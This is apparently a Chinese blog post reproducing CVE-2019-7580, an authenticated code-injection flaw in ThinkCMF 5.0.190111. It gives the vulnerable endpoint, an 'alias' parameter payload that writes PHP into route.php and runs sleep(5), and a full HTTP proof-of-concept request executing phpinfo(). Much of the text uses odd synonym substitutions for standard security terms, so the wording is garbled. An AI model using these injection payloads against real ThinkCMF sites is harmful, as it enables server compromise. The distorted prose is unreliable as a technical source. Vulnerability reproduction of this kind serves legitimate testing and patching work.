ThinkCMF 5.0.190111后台代码执行(CVE-2019-7580)

破绽描绘

ThinkCMF是一套基于ThinkPHP的CMS(内容管理系统)。 ThinkCMF 5.0.190111版本中存在平安破绽。远程攻击者攻击者可经过向portal / admin_category / addpost.html页面发送‘别名’参数应用该破绽注入恣意代码。
 


 

破绽版本

ThinkCMF 5.0.190111
 


 

破绽复现

后台登录状态下,
1、将payload插入数据库并读取然后写入data/conf/route.php文件

POST /portal/admin_category/addpost.html
parent_id=0&name=111&alias=a'=>array(%22%22)%2csleep(5)%2c'b

2、然后访问:

/portal/admin_category/index.html

触发

include data/conf/route.php

操作,执行payload。下图以执行sleep(5)作为演示。

图片[1]-ThinkCMF 5.0.190111后台代码执行(CVE-2019-7580)-孤勇者社区

附PoC:

POST /portal/admin_category/addpost.html HTTP/1.1
Host: 192.168.170.209
Content-Length: 183
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=of2ar92rpeucrh4cg6s4t4dae6; admin_username=admin
Connection: close

parent_id=0&name=111&alias=1'%3D%3Earray(%22%22)%2Cphpinfo()%2C'2

图片[2]-ThinkCMF 5.0.190111后台代码执行(CVE-2019-7580)-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片